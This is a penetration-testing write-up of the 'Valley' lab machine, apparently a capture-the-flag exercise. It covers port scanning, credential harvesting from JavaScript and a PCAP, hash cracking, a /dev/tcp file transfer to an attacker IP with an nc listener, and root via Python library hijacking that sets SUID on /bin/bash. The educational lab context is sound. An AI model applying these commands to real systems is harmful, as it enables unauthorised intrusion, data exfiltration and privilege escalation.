Skip to main content

Valley

This report details the penetration testing of the "Valley" machine. The engagement began with reconnaissance, identifying open ports and services. Vulnerabilities were discovered in a web application, including directory traversal and exposed credentials. These vulnerabilities were leveraged to gain initial access via SSH. Further enumeration revealed a misconfigured cron job, leading to privilege escalation and full root access.

1. Reconnaissance and Enumeration

1.1. Port Scanning

export TARGET_IP=10.10.146.21
nmap -p- --min-rate 5000 $TARGET_IP

Output:

Not shown: 65441 closed tcp ports (reset), 91 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
37370/tcp open unknown

1.2. Web Application Enumeration

The presence of an HTTP server on port 80 prompted an investigation of the web application.

1.2.1 Directory Traversal Hypothesis

Browsing to http://$TARGET_IP/gallery/gallery.html revealed a gallery of images. Clicking on an image led to a URL like http://$TARGET_IP/static/1. This numerical pattern suggested a potential directory traversal or predictable resource location vulnerability.

1.2.2. Directory Bruteforcing

To test this hypothesis, ffuf (a fast web fuzzer) was used to enumerate potential files within the /static/ directory. A wordlist of numbers was generated using seq.

seq -w 0 99 > numbers.txt  # Create a wordlist with numbers 00 to 99.
ffuf -u http://$TARGET_IP/static/FUZZ -w numbers.txt

Output:

00                      [Status: 200, Size: 127, Words: 15, Lines: 6, Duration: 424ms]

Findings:

  • A file named 00 was found with a 200 OK status code, indicating success.

1.2.3. Developer Notes

Accessing http://$TARGET_IP/static/00 revealed developer notes:

dev notes from valleyDev:
-add wedding photo examples
-redo the editing on #4
-remove /dev1243224123123
-check for SIEM alerts

Key Finding: The note -remove /dev1243224123123 indicated a potentially sensitive directory that was intended to be removed.

1.3. Hidden Directory and Login Page

Browsing to http://$TARGET_IP/dev1243224123123/ revealed a login page. This suggests a development or administrative interface.

1.3.1. Source Code Review

The login page's JavaScript source code was reviewed to understand the authentication mechanism. This is a crucial step in identifying potential bypasses.

// (Simplified for clarity and brevity)
function isValidUsername(username) {
// Reversed Logic: Valid if length < 5
return username.length < 5;
}

function isValidPassword(password) {
//Reversed Logic: Valid if length < 7
return password.length < 7;
}

loginButton.addEventListener("click", (e) => {
e.preventDefault();
const username = loginForm.username.value;
const password = loginForm.password.value;

if (username === "siemDev" && password === "california") {
window.location.href = "/dev1243224123123/devNotes37370.txt";
} else {
loginErrorMsg.style.opacity = 1;
}
})

Findings:

  • Hardcoded Credentials: The username siemDev and password california were found directly in the JavaScript.
  • Reversed validation logic: The username is only valid if length is less than 5, and password if length is less than 7.

1.4. FTP Enumeration

/dev1243224123123/devNotes37370.txt contained:

dev notes for ftp server:
-stop reusing credentials
-check for any vulnerabilies
-stay up to date on patching
-change ftp port to normal port

This strongly suggested that port 37370 might be running an FTP service.

1.4.1. FTP Login and File Download

Using the previously discovered credentials (siemDev:california), we connected to the FTP server on port 37370 and downloaded a PCAP file.

ftp $TARGET_IP 37370
# Login with siemDev:california
mget siemHTTP2.pcapng # Download the file

1.4.2. PCAP Analysis (Wireshark)

The downloaded siemHTTP2.pcapng file was analyzed using Wireshark, a network protocol analyzer. Focusing on HTTP traffic, we searched for sensitive data.

Finding: Packet number 2335 contained URL-encoded form data, revealing another set of credentials:

Form item: "uname" = "valleyDev"
Form item: "psw" = "ph0t0s1234"
Form item: "remember" = "on"

2. Initial Access (SSH)

The credentials obtained from the PCAP file (valleyDev:ph0t0s1234) were used to successfully log in to the machine via SSH.

ssh valleyDev@$TARGET_IP  # Password: ph0t0s1234

3. Hash Cracking

We will send the file valleyAuthenticator from /home/ to our machine.

# Receiver
nc -lvnp 6666 > valleyAuthenticator
# Sender
cat valleyAuthenticator > /dev/tcp/10.2.17.44/6666 #Replace with your IP
strings valleyAuthenticator | grep -C 10 "pass"

We noticed the following strings

A [3	<
?ATs
-^;x&
e6722920bab2326f8217e4
bf6b1b58ac
ddJ1cc76ee3
beb60709056cfbOW
elcome to Valley Inc. Authentica
[k0rHh
is your usernad
Ol: /passwXd.{
~{edJrong P=
sL_striF::_M_M
v0ida%02xo
~ c-74
lrec
{4_af$
oBof '
1__g
_lock_
rorOu

The string e6722920bab2326f8217e4bf6b1b58ac has 32 characters, which is the length of an MD5 hash, so we proceed to identify the hash and crack it.

hashcat --identify e6722920bab2326f8217e4bf6b1b58ac
# | Name                                                       | Category
======+============================================================+======================================
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
70 | md5(utf16le($pass)) | Raw Hash
...
hashcat -a 0 -m 0 e6722920bab2326f8217e4bf6b1b58ac /usr/share/wordlists/rockyou.txt # e6722920bab2326f8217e4bf6b1b58ac:liberty123
su valley # Password: liberty123

4. Privilege Escalation

4.1. Local Enumeration

The next step was to enumerate the system for potential privilege escalation vectors. This included checking user privileges, group memberships, and running processes.

id  # Check user and group IDs

Finding: The valley user was a member of the valleyAdmin group.

4.2. Group-Based File Permissions

A search for files owned by the valleyAdmin group was conducted to identify potential targets for privilege escalation.

find / -group valleyAdmin -type f 2>/dev/null

Finding: /usr/lib/python3.8/base64.py was owned by the valleyAdmin group. This is a standard Python library, suggesting a potential for library hijacking.

4.3. Cron Job Analysis

The /etc/crontab file was examined to identify scheduled tasks (cron jobs). Cron jobs are often a source of privilege escalation if they run with elevated privileges and interact with files writable by a lower-privileged user.

cat /etc/crontab

Finding: The following cron job was found:

1  *    * * *   root    python3 /photos/script/photosEncrypt.py

This cron job runs /photos/script/photosEncrypt.py as the root user every minute. The script uses the base64 Python library.

head /photos/script/photosEncrypt.py #check the file content
#!/usr/bin/python3
import base64
...

4.4. Library Hijacking

Because the valley user (via the valleyAdmin group) had write access to /usr/lib/python3.8/base64.py, and this library was used by a root-run cron job, a library hijacking attack was possible.

The base64.py file was modified to add a command that would set the SUID bit on /bin/bash. The SUID bit allows a binary to be executed with the permissions of the file's owner (in this case, root).

nano /usr/lib/python3.8/base64.py

Added Code (at the beginning of the file):

import os
os.system("chmod u+s /bin/bash")

4.5. Gaining Root Access

After waiting for the cron job to execute, the permissions of /bin/bash were checked.

ls -l /bin/bash

Output (after waiting):

-rwsr-xr-x 1 root root 1183448 Apr 18  2022 /bin/bash

The s in the permissions string (-rwsr-xr-x) indicates that the SUID bit is set. Now, /bin/bash can be executed with root privileges using the -p option (to preserve privileges).

bash -p  # Execute bash with preserved privileges
id # Verify effective user ID (euid)

Output:

uid=1000(valley) gid=1000(valley) euid=0(root) groups=1000(valley),1003(valleyAdmin)

Result: The euid=0(root) confirms that we have successfully gained root access.